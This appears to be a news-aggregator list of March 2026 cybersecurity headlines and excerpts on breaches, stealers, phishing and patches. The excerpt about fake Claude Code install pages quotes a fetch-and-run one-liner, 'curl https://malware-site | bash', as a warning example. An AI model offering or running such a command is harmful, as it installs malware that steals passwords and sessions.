- Patch Tuesday – March 2026
March 10, 2026
Microsoft is publishing 77 vulnerabilities this March 2026 Patch Tuesday. Microsoft is aware of public disclosure of two of today’s vulnerabilities, but without evidence of exploitation in the wild for any (yet), so there are no Microsoft additions to CISA KEV today. Earlier in the month, Microsoft provided patches to address nine browser vulnerabilities, which are ...
- Salt Typhoon is hacking the world’s phone and internet giants
March 9, 2026
Salt Typhoon is behind one of the broadest hacking campaigns in recent years, targeting some of the world’s largest phone and internet companies and stealing tens of millions of phone records about senior government officials. The hacking group, attributed to China, is part of a wider cluster of hackers with the collective aim of helping China ...
- ShinyHunters claims more high-profile victims in latest Salesforce customers data heist
March 9, 2026
ShinyHunters told The Register that it has stolen data from about 100 high-profile companies in its latest Salesforce customer data heist, including Salesforce itself. “Have stolen data from almost 400 websites and about 100 essential high profile companies Snowflake, Okta, Lastpass, Salesforce itself, Sony, AMD, and a lot more,” a ShinyHunters spokesperson told us, adding ...
- Fake Claude Code install pages hit Windows and Mac users with infostealers
March 9, 2026
Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter. That habit turns the ...
- Russian cybercrims phish their way into officials’ Signal and WhatsApp accounts
March 9, 2026
Russian-linked hackers are trying to break into the Signal and WhatsApp accounts of government officials, journalists, and military personnel globally – not by cracking encryption, but by simply tricking people into handing over the keys. That’s the warning issued Monday by the Netherlands’ intelligence and military security agencies, the AIVD and MIVD, which say a “large-scale” ...
- Cisco warns of two more SD-WAN bugs under active attack
March 6, 2026
Just when network admins thought the Cisco SD-WAN patch queue might finally be shrinking, Switchzilla has confirmed miscreants are exploiting more vulnerabilities in its SD-WAN management software. The newly abused flaws affect Cisco Catalyst SD-WAN Manager, the platform formerly known as vManage that sits at the center of many organizations’ SD-WAN deployments. One of the bugs, ...
- Securing ambient AI in healthcare: governance is the new front line
March 5, 2026
Ambient AI is no longer experimental. It’s live. From AI-powered clinical documentation assistants to remote monitoring systems and intelligent patient engagement agents, healthcare organizations are embedding AI directly into care delivery. The promise is compelling: less administrative burden, faster insights, and more time with patients. But as AI enters clinical workflows, a more urgent question emerges: ...
- New BoryptGrab Stealer Targets Windows Users via Deceptive GitHub Pages
March 5, 2026
Trend Micro researchers recently found the existence of a new stealer binary that collects browser and cryptocurrency wallet data, system information, and common files, among others. The researchers designated this new stealer BoryptGrab. Certain variants of the stealer can download a PyInstaller backdoor, which Trend Micro refer to as TunnesshClient. TunnesshClient establishes a reverse Secure Shell ...
- Microsoft warns of new signed malware which deploys remote monitoring tools as backdoors
March 5, 2026
Microsoft is warning of a new phishing campaign which aims to deploy persistent backdoors to victim’s computers. In a new in-depth analysis, the company’s researchers said they recently spotted multiple phishing campaigns, currently not attributed to any known threat actors, which send out emails with weaponized PDF files (financial documents, invoices), fake meeting invitations, or organizational ...
- Taiwan Indicts 62 Over Laundering $339M From Crypto Scam Compounds in Cambodia
March 4, 2026
Taiwanese prosecutors have indicted 62 people over their alleged links to Prince Group, a network designated as a transnational criminal organization by the U.S. Department of Justice. According to a report by Reuters, those indicted include the group’s chairman and alleged mastermind Chen Zhi, who was arrested in Cambodia and extradited to China earlier this year.Thirteen ...
- ‘Hundreds’ of Iranian hacking attempts have hit surveillance cameras since the missile strikes
March 4, 2026
Multiple Iranian hacking crews have been targeting internet-connected surveillance cameras across Israel and other Middle Eastern countries since the war started on February 28, according to Check Point security researchers. The Tel Aviv-based security shop has tracked “hundreds” of attempts to exploit a handful of bugs in IP cameras made by two manufacturers, Hikvision and Dahua, ...